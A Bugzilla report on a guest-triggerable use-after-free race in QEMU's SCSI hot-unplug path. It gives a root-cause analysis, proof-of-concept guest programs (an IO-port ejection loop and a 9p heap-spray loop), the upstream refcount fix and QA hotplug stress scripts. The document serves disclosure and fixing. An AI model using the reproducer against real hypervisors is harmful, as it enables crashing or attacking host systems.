Created attachment 1700266 [details] Qemu-scsi-use-after-free-reproducer Wenxiang Qian <leonwxqian> has reported this issue. It is quite similar to BZ#1812399 & BZ#1812399 -> https://drive.google.com/file/d/1qGptfDhKJNs5OLQ6a2HPuT_-kRuvIBCu/view -> https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg Description of problem: Overview: ========= The "opaque" object in scsi_dma_restart_bh can be used after free. The operation qemu_bh_delete(s->bh); will use the freed "opaque (s)" object directly. Freed "s (opaque)" can be occupied by other data, so the s->bh can point to arbitrary address and freed by qemu_bh_delete later: void qemu_bh_delete(QEMUBH *bh){ g_free(bh); } Root cause of the vulnerability: ================================ 1. Whenever there’s an SCSI device add/plugged into the guest, the callback scsi_dma_restart_cb will be added. 2. When there’s a state change in guest, callback scsi_dma_restart_cb will be called and schedule bottom half: scsi_dma_restart_bh with opaque=s if guest is not in shutdown process. 3. In main IO thread, there’s a loop of glib_pollfds_poll, when fd is ready, AIO operations will be called and then scsi_dma_restart_bh is called. (The 'USE' part) 4. Meanwhile, attacker could write something to IOPORT to unplug the device, and in another thread, will trigger acpi_pcihp_eject_slot , then device_unparent and will free the related memory to the device. (The 'FREE' part) 5. Step (3) (4) could cause a race condition, if (4) is called prior to (3), there’s a UaF. Related code: *hw/scsi/scsi-bus.c*:scsi_dma_restart_cb, scsi_dma_restart_bh *hw/acpi/pcihp.c*:acpi_pcihp_eject_slot Version-Release number of selected component (if applicable): - Host: Ubuntu 16.04 x86_64 - Guest: Ubuntu 18.04 x86_64 - Qemu: 4.2.0 (I checked the commit between 4.2.0-5.0.0 and I believe 5.0.0 has the same problem) - libvirt: 6.0.0 with KVM enabled How reproducible: - Some times the crash occurs. Steps to Reproduce: Different Ways To Trigger the Use-after-free: ============================================= a. If the guest system could be suspended (paused), here’s a simple way to test: 1. Know the slot number of the disk X being attached. (By finding the next available slot number from lspci) 2. Do not attach disk X now, start a program in the guest. That program will *infinitely* write (2 << slot) to the IOPORT of the bus, try to release disk X. 3. Pause the guest and attach disk X. 4. Resume the guest. Now bh callback and the IOPORT write should run at the same time, and cause UAF by chance. If it is not succeeded, repeat steps 3-4. PoC: ==== 1. You can create a disk image and install Ubuntu on it, and then update "source file=" of d.xml to the path of the disk image ( The disk I used is about 4 GB, if you need that, I can try to share it through like Google cloud storage with you.). <disk type='file' device='disk'> <driver name='qemu' type='qcow2'/> <source file='/foo/bar.qcow2'/> <== <!--here--> <target dev='sda' bus='scsi'/> <address type='drive' controller='0' bus='0' target='0' unit='0'/> </disk> 2. We used 9p to occupy the memory of freed object. The strdup(malloc) here: You can create a new directory, such as ~/share, on the host, and create folder AAAA..(255 A's)/AAAA..(255 A's)/AAAAAAAAAA(10 A's) in ~/share. This will set up a 255+1+255+1+10=522 bytes directory which is the same size of freed SCSIDevice object (64 bit). Then modify the directory in d.xml, point it to ~/share: -> <qemu:arg value='local,id=share,path=/home/foo/share,security_model=none'/> 3. Create a disk, for example, run `qemu-img -f qcow2 ./foo.qcow2 10M` in the host, to create a disk and update the disk path in disk1.xml to ./foo.qcow2. 4. Run `virsh create d.xml` and a guest machine with the name "testpoc" should be listed in the libvirt. 5. Connect to testpoc and write this program and compile in guest: //io2.c: #include <sys/io.h> #include <stdlib.h> int main(void) { iopl(3); while(1) { outb(1<<2, 0xae08); } return 0; } Compile with: gcc -O2 ./io2.c -o ./io2 6. Please compile this in guest too : //9pacc.c #include <stdlib.h> #include <string.h> #include <unistd.h> #include <dirent.h> #define FSIZE 0x300 int main(void) { char foo[256] = {0}; char boo[256] = {0} char foldername[FSIZE] = {0}; memset(foo, 0x41, 255); memset(boo, 0x42, 255); snprintf(foldername, FSIZE, "/home/leonwxqian/share/%s/%s/AAAAAAAAAA",foo, boo); DIR *dir = 0; while(1) { dir = opendir(foldername); closedir(dir); } return 0; } Compile with: gcc ./9pacc.c -o ./9pacc 7. Create folder ~/share in guest then (Please change this to the directory you created in step 2!) sudo mount -t 9p -o trans=virtio,version=9p2000.L share /home/leonwxqian/share 8. Start "./9pacc &" in guest 9. Start "sudo ./io2" in guest 10. Run "poc.sh" in the host machine, if it is not succeeded, run poc.sh again. Actual results: - Guest VM crashes - https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg Expected results: - Should not crash the guest. Additional info:
Proposed fix patch from Paolo Bonzini | I think this is simpler than the issue that Maxim is working on. | Wenxiang, would this fix your PoC? | | diff --git a/hw/scsi/scsi-bus.c b/hw/scsi/scsi-bus.c | index 1c980cab38..1b0cf91532 100644 | --- a/hw/scsi/scsi-bus.c | +++ b/hw/scsi/scsi-bus.c | @@ -137,6 +137,7 @@ static void scsi_dma_restart_bh(void *opaque) | scsi_req_unref(req); | } | aio_context_release(blk_get_aio_context(s->conf.blk)); | + object_unref(OBJECT(s)); | } | | void scsi_req_retry(SCSIRequest *req) | @@ -155,6 +156,8 @@ static void scsi_dma_restart_cb(void *opaque, int | running, RunState state) | } | if (!s->bh) { | AioContext *ctx = blk_get_aio_context(s->conf.blk); | + /* The reference is dropped in scsi_dma_restart_bh. */ | + object_ref(OBJECT(s)); | s->bh = aio_bh_new(ctx, scsi_dma_restart_bh, s); | qemu_bh_schedule(s->bh); | } | | Thanks, | Paolo
Hi, could you please take a view of customer how to reproduce this issue? like as using qemu command line to create vm, and what to do may hit this issue.
Hello Qing, (In reply to qing.wang from comment #2) > Hi, could you please take a view of customer how to reproduce this issue? > like as using qemu command line to create vm, and what to do may hit this > issue. The attachment here contains 3 files - d.xml, disk1.xml and poc.sh d.xml has the guest configuration and command line parameters in it. Guest starts with $ virsh create --console d.xml We need to edit d.xml and disk1.xml to set local guest image and qemu paths as described above. Hope it helps. Thank you.
I tried to reproduce this with latest qemu (which contains my and Paulo's scsi/rcu work), and I wasn't able yet to hit this, however I do think that at least in theory the race is still there. For the use after free to happen this sequence of events should still be possible in theory: 1. vm continue event schedules the scsi_dma_restart_bh (this has to happen before the scsi device is unrealized because first thing scsi_qdev_unrealize does is to remove the VM state change callback which schedules the scsi_dma_restart_bh) 2. scsi device is unrealized, dropped off the bus and scheduled to be removed by the RCU callback 3. rcu thread callback frees the scsi device. 4. for some reason only now the bottom half is run. I'll send the Paulo's patch upstream to discuss it there. Best regards, Maxim Levitsky
Resolved by qemu-kvm upstream commit cfd4e36352d4426221aa94da44a172da1aaa741b Setting ITM=13 under the assumption Maxim will be able to post the downstream patch soon We will need a qa_ack+ please too. Feel free to alter the ITM I chose to a later value.
Yep.
Test on Red Hat Enterprise Linux release 8.4 Beta (Ootpa) 4.18.0-287.el8.x86_64 qemu-kvm-common-5.2.0-6.module+el8.4.0+9871+53903be9.x86_64 Test steps refer to https://bugzilla.redhat.com/show_bug.cgi?id=1812399#c27 Scenario 1: 1.boot vm virsh define pc.xml;virsh start pc 2.hotplug-unplug disk repeatly while true;do virsh attach-device pc disk.xml; virsh detach-device pc disk.xml;done Running over 10 hour , no crash issue found. Scenario 2: 1. create 40 image files qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg0.qcow2 1G ... qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg40.qcow2 1G 2.boot vm /usr/libexec/qemu-kvm \ -name 'avocado-vt-vm1' \ -sandbox on \ -machine pc \ -device pcie-root-port,id=pcie-root-port-0,multifunction=on,bus=pci.0,addr=0x2,chassis=1 \ -device pcie-pci-bridge,id=pcie-pci-bridge-0,addr=0x0,bus=pcie-root-port-0 \ -nodefaults \ -device VGA,bus=pci.0,addr=0x3 \ -m 2048 \ -smp 12,maxcpus=12,cores=6,threads=1,sockets=2 \ -device pcie-root-port,id=pcie-root-port-1,bus=pci.0,chassis=2 \ -device pcie-root-port,id=pcie-root-port-2,port=0x2,bus=pci.0,chassis=3 \ -device qemu-xhci,id=usb1,bus=pcie-root-port-1,addr=0x0 \ -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1 \ -object iothread,id=iothread1 \ -device virtio-scsi,id=scsi0 \ -device virtio-scsi,id=scsi1,iothread=iothread1 \ -drive id=drive_image1,if=none,snapshot=off,aio=threads,cache=none,format=qcow2,file=/home/kvm_autotest_root/images/rhel831-64-virtio-scsi.qcow2 \ -device scsi-hd,id=image1,drive=drive_image1,bootindex=0,bus=scsi0.0 \ \ -blockdev node-name=test_disk0,driver=file,filename=/home/kvm_autotest_root/images/stg0.qcow2 \ -device scsi-hd,drive=test_disk0,bus=scsi1.0,bootindex=-1,id=scsi_disk0,channel=0,scsi-id=0,channel=0,scsi-id=0,lun=0,share-rw \ -blockdev node-name=test_disk1,driver=file,filename=/home/kvm_autotest_root/images/stg1.qcow2 \ -blockdev node-name=test_disk2,driver=file,filename=/home/kvm_autotest_root/images/stg2.qcow2 \ -blockdev node-name=test_disk3,driver=file,filename=/home/kvm_autotest_root/images/stg3.qcow2 \ -blockdev node-name=test_disk4,driver=file,filename=/home/kvm_autotest_root/images/stg4.qcow2 \ -blockdev node-name=test_disk5,driver=file,filename=/home/kvm_autotest_root/images/stg5.qcow2 \ -blockdev node-name=test_disk6,driver=file,filename=/home/kvm_autotest_root/images/stg6.qcow2 \ -blockdev node-name=test_disk7,driver=file,filename=/home/kvm_autotest_root/images/stg7.qcow2 \ -blockdev node-name=test_disk8,driver=file,filename=/home/kvm_autotest_root/images/stg8.qcow2 \ -blockdev node-name=test_disk9,driver=file,filename=/home/kvm_autotest_root/images/stg9.qcow2 \ -blockdev node-name=test_disk10,driver=file,filename=/home/kvm_autotest_root/images/stg10.qcow2 \ -blockdev node-name=test_disk11,driver=file,filename=/home/kvm_autotest_root/images/stg11.qcow2 \ -blockdev node-name=test_disk12,driver=file,filename=/home/kvm_autotest_root/images/stg12.qcow2 \ -blockdev node-name=test_disk13,driver=file,filename=/home/kvm_autotest_root/images/stg13.qcow2 \ -blockdev node-name=test_disk14,driver=file,filename=/home/kvm_autotest_root/images/stg14.qcow2 \ -blockdev node-name=test_disk15,driver=file,filename=/home/kvm_autotest_root/images/stg15.qcow2 \ -blockdev node-name=test_disk16,driver=file,filename=/home/kvm_autotest_root/images/stg16.qcow2 \ -blockdev node-name=test_disk17,driver=file,filename=/home/kvm_autotest_root/images/stg17.qcow2 \ -blockdev node-name=test_disk18,driver=file,filename=/home/kvm_autotest_root/images/stg18.qcow2 \ -blockdev node-name=test_disk19,driver=file,filename=/home/kvm_autotest_root/images/stg19.qcow2 \ -blockdev node-name=test_disk20,driver=file,filename=/home/kvm_autotest_root/images/stg20.qcow2 \ -blockdev node-name=test_disk21,driver=file,filename=/home/kvm_autotest_root/images/stg21.qcow2 \ -blockdev node-name=test_disk22,driver=file,filename=/home/kvm_autotest_root/images/stg22.qcow2 \ -blockdev node-name=test_disk23,driver=file,filename=/home/kvm_autotest_root/images/stg23.qcow2 \ -blockdev node-name=test_disk24,driver=file,filename=/home/kvm_autotest_root/images/stg24.qcow2 \ -blockdev node-name=test_disk25,driver=file,filename=/home/kvm_autotest_root/images/stg25.qcow2 \ -blockdev node-name=test_disk26,driver=file,filename=/home/kvm_autotest_root/images/stg26.qcow2 \ -blockdev node-name=test_disk27,driver=file,filename=/home/kvm_autotest_root/images/stg27.qcow2 \ -blockdev node-name=test_disk28,driver=file,filename=/home/kvm_autotest_root/images/stg28.qcow2 \ -blockdev node-name=test_disk29,driver=file,filename=/home/kvm_autotest_root/images/stg29.qcow2 \ -blockdev node-name=test_disk30,driver=file,filename=/home/kvm_autotest_root/images/stg30.qcow2 \ -blockdev node-name=test_disk31,driver=file,filename=/home/kvm_autotest_root/images/stg31.qcow2 \ -blockdev node-name=test_disk32,driver=file,filename=/home/kvm_autotest_root/images/stg32.qcow2 \ -blockdev node-name=test_disk33,driver=file,filename=/home/kvm_autotest_root/images/stg33.qcow2 \ -blockdev node-name=test_disk34,driver=file,filename=/home/kvm_autotest_root/images/stg34.qcow2 \ -blockdev node-name=test_disk35,driver=file,filename=/home/kvm_autotest_root/images/stg35.qcow2 \ -blockdev node-name=test_disk36,driver=file,filename=/home/kvm_autotest_root/images/stg36.qcow2 \ -blockdev node-name=test_disk37,driver=file,filename=/home/kvm_autotest_root/images/stg37.qcow2 \ -blockdev node-name=test_disk38,driver=file,filename=/home/kvm_autotest_root/images/stg38.qcow2 \ -blockdev node-name=test_disk39,driver=file,filename=/home/kvm_autotest_root/images/stg39.qcow2 \ -blockdev node-name=test_disk40,driver=file,filename=/home/kvm_autotest_root/images/stg40.qcow2 \ \ -device pcie-root-port,id=pcie-root-port-3,port=0x3,bus=pci.0,chassis=4 \ -device virtio-net-pci,mac=9a:21:f7:4a:1e:bd,id=idRuZxfv,netdev=idOpPVAe,bus=pcie-root-port-3,addr=0x0 \ -netdev tap,id=idOpPVAe,vhost=on \ -rtc base=localtime,clock=host,driftfix=slew \ -boot menu=off,order=cdn,once=c,strict=off \ -enable-kvm \ -vnc :5 \ -rtc base=localtime,clock=host,driftfix=slew \ -boot order=cdn,once=c,menu=off,strict=off \ -enable-kvm \ -device pcie-root-port,id=pcie_extra_root_port_0,bus=pci.0 \ -monitor stdio \ -chardev file,id=qmp_id_qmpmonitor1,path=/var/tmp/monitor-qmpdbg.log,server,nowait \ -mon chardev=qmp_id_qmpmonitor1,mode=control \ -qmp tcp:0:5955,server,nowait \ -chardev file,path=/var/tmp/monitor-serialdbg.log,id=serial_id_serial0 \ -device isa-serial,chardev=serial_id_serial0 \ 3.login guest and execute sg_luns with multi instances trap 'kill $(jobs -p)' EXIT SIGINT for i in `seq 0 32` ; do while true ; do # sg_luns /dev/sdb > /dev/null 2>&1 sg_luns /dev/sdb done & done echo "wait" wait 4.hotplug-unlug multi disks repeatly on each 3 seconds NUM_LUNS=40 add_devices() { exec 3<>/dev/tcp/localhost/5955 echo "$@" echo -e "{'execute':'qmp_capabilities'}" >&3 read response <&3 echo $response for i in $(seq 1 $NUM_LUNS) ; do cmd="{'execute':'device_add', 'arguments': {'driver':'scsi-hd','drive':'test_disk$i','id':'scsi_disk$i','bus':'scsi1.0','lun':$i}}" echo "$cmd" echo -e "$cmd" >&3 read response <&3 echo "$response" done } remove_devices() { exec 3<>/dev/tcp/localhost/5955 echo "$@" echo -e "{'execute':'qmp_capabilities'}" >&3 read response <&3 echo $response for i in $(seq 1 $NUM_LUNS) ; do cmd="{'execute':'device_del', 'arguments': {'id':'scsi_disk$i'}}" echo "$cmd" echo -e "$cmd" >&3 read response <&3 echo "$response" done } while true ; do echo "adding devices" add_devices sleep 3 echo "removing devices" remove_devices sleep 3 done running over 10 hour, no crash issue found.
Since the problem described in this bug report should be resolved in a recent advisory, it has been closed with a resolution of ERRATA. For information on the advisory (virt:av bug fix and enhancement update), and where to find the updated files, follow the link below. If the solution does not work for you, open a new bug report. https://access.redhat.com/errata/RHBA-2021:2098